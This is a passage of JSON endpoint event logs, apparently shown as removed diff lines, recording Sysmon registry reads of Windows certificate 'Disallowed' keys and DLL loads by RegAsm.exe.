"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 